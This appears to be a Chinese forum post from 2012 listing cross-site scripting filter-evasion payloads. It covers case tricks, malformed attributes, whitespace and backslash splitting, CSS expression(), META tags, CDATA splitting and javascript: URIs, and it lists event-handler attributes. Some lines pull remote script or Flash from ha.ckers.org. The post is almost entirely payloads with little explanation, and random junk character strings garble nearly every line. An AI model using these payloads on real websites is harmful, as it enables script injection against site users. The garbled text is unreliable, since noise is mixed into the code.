1. 改变字符大小写 D5 s5 T. r$ m, v
. r- b6 }0 J1 f2 J, h; j- V2 V8 h
7 P! c# L5 b5 U8 M u1 z( k& ^3 M* ^5 ~: W0 v2 w3 j7 v1 `
<sCript>alert(‘d’)</scRipT>9 R* ^" [1 n0 i% Y1 P% e' `
3 l; ^4 R% C4 Q5 x! R2 x, t
2. 利用多加一些其它字符来规避Regular Expression的检查4 Q- v* w, [- x
1 j* O7 Y* u* G; y
<<script>alert(‘c’)//<</script>
) e J4 |3 Y9 J u { L \0 P
& G2 C9 o7 B1 t I' `; N4 z5 Z& b <SCRIPT a=">" SRC="t.js"></SCRIPT>
2 o0 ]' B. i' V) S# ^9 q
+ ?% w7 G1 i7 ~& U* y) x9 _ <SCRIPT =">" SRC="t.js"></SCRIPT>
' F, z+ Y! h3 r1 w) b* F" n* l7 k' J5 [7 t: S* [
<SCRIPT a=">" ” SRC="t.js"></SCRIPT>
( b& ^4 D' ]. `0 [* [6 d' u: N) I
O" G) j0 [3 E _ <SCRIPT "a=’>’" SRC="t.js"></SCRIPT>
& m4 D( N: |# l' G8 a
% v. f8 L( \/ o/ K" c* z <SCRIPT a=`>` SRC="t.js"></SCRIPT>" f+ _( l5 W7 V- }
7 n0 t$ A1 c9 X' e$ K3 j
<SCRIPT a=">’>" SRC="t.js"></SCRIPT>
1 G6 l% l( I1 M9 P1 h/ q9 {
- z9 F' `8 K. p3. 以其它扩展名取代.js7 p/ G% e2 a& H# r, z
3 X: ^ S0 X6 M
<script src="bad.jpg"></script>
; t9 b2 `# Z7 E* \& ]
: @+ }" @, v% _; K2 T* ?4. 将Javascript写在CSS档里
, @/ t1 r) d( n2 n- s: f0 k
, H2 X7 a D- Y$ K S6 U: s9 |2 J6 a <LINK REL="stylesheet" HREF="http://ha.ckers.org/xss.css">/ w8 B: Y, p' y& w
8 g% ?1 R. j& ~$ } example:% g( [! C* R' } W$ h% F N
) s! O/ L" C# }8 t& ~' N body {
# |1 K7 |( p+ e8 P- A
9 }/ P! R4 W# G background-image: url(‘javascript:alert("XSS");’)+ o3 z% s0 u2 A% t+ R8 X$ E
/ z. [6 y' ~8 H3 E( T) M2 M }4 d5 t. f5 S+ f$ m
! Q, G- B) n, s: l: T, f& J; r7 E5. 在script的tag里加入一些其它字符
. j3 l3 }! d: B0 G1 y2 q' s: _! h
<SCRIPT/SRC="t.js"></SCRIPT>
2 ^& E) k9 s [3 c/ d& o9 K5 d( y% F0 Z! I
<SCRIPT/anyword SRC="t.js"></SCRIPT>: N$ |+ G7 Z! x5 d
! A7 {( |1 [* U/ v+ T9 z
6. 使用tab或是new line来规避! Y3 j' s4 O8 v
, O9 D2 z: c* M: [ <img src="jav ascr ipt:alert(‘XSS3′)">
. _4 I- f2 x/ ]7 R9 D
% O) ]0 B1 a9 i# n" M+ o- U <img src="jav ascr ipt:alert(‘XSS3′)">
. o1 I, _/ g5 S
( m; T& \- h$ l <IMG SRC="jav ascript:alert(‘XSS’);">* C2 ~9 [8 y2 O% o! {
, E. H, y3 R) o/ b( q
-> tag# ]5 Q! s+ o* Q0 W, ]
5 M( G( G- r) c( r
-> new line. A/ @/ N. m g
/ }* b9 l6 D( f5 ~# U
7. 使用"\"来规避! I- h( H) F% e1 W; u0 {* F. `
% y# d: H5 R; T. b
<STYLE>@im\port’\ja\vasc\ript:alert("XSS32")’;</STYLE>
1 l; R% k; a( \" J; }# r5 H& l6 n# B8 y7 m7 C3 n8 k4 K4 L" p7 ~
<IMG STYLE=’xss:expre\ssion(alert("XSS33"))’>
# Q8 H% G) R" v; I$ |2 D. `
8 v, e% M; {; t <IMG STYLE="xss:expr/*anyword*/ession(alert(‘sss’))">/ W- ?0 b, v9 b9 N. L- U' F1 w
- e. Q3 [( \ s8 Z, X0 b, s6 e8 l2 @' X9 | <DIV STYLE="width: expre\ssi\on(alert(‘XSS31′));">+ G) l4 l7 m8 J8 z3 G) U2 D0 P
# p4 W3 X! d! E
<A STYLE=’no\xss:noxss("*//*"); xss:ex/*XSS*//*/*/pression(alert("XSS"))’>
+ P0 C4 I5 a1 t2 k
}: c9 e, D" h" c3 b8. 使用Hex encode来规避(也可能会把";"拿掉)
4 p* h$ r& Y) e. o1 x7 o' W8 ~+ W7 c. R' n y
<DIV STYLE="width: expre\ssi\on(alert(‘XSS31′));">
0 Q1 R0 ?5 S. E. V$ H/ U4 M% e5 |+ y! `0 H5 ]
原始码:<DIV STYLE="width: expre\ssi\on(alert(‘XSS31′));">
& ]/ M' N9 H8 m) T6 J& m/ j" B; I2 n8 d+ M- V, ~9 ^
<META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert(‘abc’);">+ T4 {% d# N3 ~' s% ~; A
3 C+ a' }( o- j 原始码:<META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert(‘abc’);">
) y4 U, g. Q0 e" S$ I
" A" \6 j, s0 B9 I, T7 k9. script in HTML tag
. J- s, B }# N/ J3 q6 |
$ X* U; S1 d( M) {; q <body onload=」alert(‘onload’)」>8 _& M( L* T* H; D& Z" T
) n6 U y# w& |9 S [0 i$ l onabort, onactivate, onafterprint, onafterupdate, onbeforeactivate, onbeforecopy, onbeforecut, onbeforedeactivate, onbeforeeditfocus, onbeforepaste, onbeforeprint, onbeforeunload, onbeforeupdate, onblur, onbounce, oncellchange, onchange, onclick, oncontextmenu, oncontrolselect, oncopy, oncut, ondataavailable, ondatasetchanged, ondatasetcomplete, ondblclick, ondeactivate, ondrag, ondragend, ondragenter, ondragleave, ondragover, ondragstart, ondrop, onerror, onerrorupdate, onfilterchange, onfinish, onfocus, onfocusin, onfocusout, onhelp, onkeydown, onkeypress, onkeyup, onlayoutcomplete, onload, onlosecapture, onmousedown, onmouseenter, onmouseleave, onmousemove, onmouseout, onmouseover, onmouseup, onmousewheel, onmove, onmoveend, onmovestart, onpaste, onpropertychange, onreadystatechange, onreset, onresize, onresizeend, onresizestart, onrowenter, onrowexit, onrowsdelete, onrowsinserted, onscroll, onselect, onselectionchange, onselectstart, onstart, onstop, onsubmit, onunload
' L/ B/ |+ _8 E0 ?
# g* d! h, N# \3 S6 r( B0 f10. 在swf里含有xss的code
0 A2 W2 c1 f P: X
/ ~9 k1 L8 r$ X) _+ O% n: @ <EMBED SRC="http://ha.ckers.org/xss.swf" AllowScriptAccess="always"></EMBED>/ ~3 d" F g3 f0 |( ^, U6 C2 \7 v
) q2 j2 {9 e! ]- T% P11. 利用CDATA将xss的code拆开,再组合起来。
, x) t j+ ?+ m
( ?1 g X. O! K2 E/ \" M x" m <XML ID=I><X><C>' Y$ N5 m# H1 d n2 g2 }! S8 p# m4 m
4 p, f+ L% h; K$ @5 J+ z6 R
<![CDATA[<IMG SRC="javas]]><![CDATA[cript:alert('XSS');">]]>+ W/ @0 ^: S7 Z" K( K8 C, ^: L
4 U z" @! [7 f. C; u/ `
</C></X>( |$ c" Q1 o6 M# S
) @! ^1 q0 [! C8 U1 l+ x6 w/ J </xml>( w5 Z. B! V+ Q1 j" `6 a) A
$ Y) F* b9 z! f/ l) n' ? <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>
4 I( f( R/ A5 U( O1 t* H; }* T) Y) h! d0 C1 S% b( C* m( `
<XML ID="xss"><I><B><IMG SRC="javas<!– –>cript:alert(‘XSS’)"></B></I></XML>, R& v# [2 j3 t3 O9 P( n+ ]
6 Z: {3 ?4 C% m- P
<SPAN DATASRC="#xss" DATAFLD="B" DATAFORMATAS="HTML"></SPAN>
; n0 y: K. z, f% l
7 w& T+ s$ b1 `+ n9 f12. 利用HTML+TIME。6 I- g' Y: l' U9 h& @; F5 ?2 `
0 S+ l! h4 l4 S3 ]1 }2 w7 V
<HTML><BODY>
$ C0 m' H) f3 G8 \( M! F0 ~# `% M: V6 g/ Y& o: K
<?xml:namespace prefix="t" ns="urn:schemas-microsoft-com:time">% _9 m' A g! z- t& r% e+ S, ^' k
! z4 c, P7 U% X <?import namespace="t" implementation="#default#time2">4 x, {: O$ `, U, j1 }2 f. q+ ?
( O% c4 \$ \# M9 C2 o2 E <t:set attributeName="innerHTML" to="anyword<SCRIPTDEFER>alert("XSS")</SCRIPT>">6 F8 T' H! N; `9 e% A3 g
+ n' J$ D: E2 Z% `
</BODY></HTML>( T0 L# ~4 \5 V) a: [# @. d
- J2 v7 I* T+ M13. 透过META写入Cookie。
% s- t7 `9 Q* O4 ~+ `8 M5 `7 }% C' ?
<META HTTP-EQUIV="Set-Cookie" Content="USERID=<SCRIPT>alert(‘XSS’)</SCRIPT>">) F6 b+ g4 T9 {1 K
# O4 V; [' `3 S3 K14. javascript in src , href , url
4 a: W' n `5 y1 S6 Z/ K: n8 p0 V
<IFRAME SRC=javascript:alert(’13′)></IFRAME>
+ ^+ \2 W$ i. U- v
/ s& J0 B6 x& u; | <img src="javascript:alert(‘XSS3′)">
" i3 r) x* K/ Y4 @9 R& Z- j; j9 a" w. _3 [2 Y9 h
<IMG DYNSRC="javascript:alert(‘XSS20′)">) E5 w. Z" U8 G( G8 ]8 W
# A E) a) O% L d. p+ j: T. a; ?
<IMG LOWSRC="javascript:alert(‘XSS21′)">
! p( G2 ?/ N. ?
% T- j3 v/ N9 o <LINK REL="stylesheet" HREF="javascript:alert(‘XSS24′);">
% `# M; W' V* t, Q
+ w. h1 c, u2 ^% c <IFRAME SRC=javascript:alert(‘XSS27′)></IFRAME>7 o W1 \6 v T7 J
S b; I6 n; e& r. L& e2 k
<TABLE BACKGROUND="javascript:alert(‘XSS29′)">: T: k# p! }7 w/ j9 P
! O! Q' v6 z; ]( k- y
<DIV STYLE="background-image: url(javascript:alert(‘XSS30′))">
* F4 Z' E+ t5 ~ [. n4 f1 r2 {: j# Y* u2 L6 _. H2 V. ]
<STYLE TYPE="text/css">.XSS{background image:url("javascript:alert(‘XSS35′)");}. z5 t8 q6 L4 r; C+ I
% B$ Y" K' f# V" Z+ ~) x0 v </STYLE><A CLASS=XSS></A>+ Y8 N! t q% g: i( i
2 ?+ }! |& y9 f <FRAMESET><FRAME SRC="javascript:alert(‘XSS’);"></FRAMESET>" B' Z& {' ~' {) j# X% A
( p# U5 s" A# K |
发表于 2012-12-31 09:59:28
收藏
支持
反对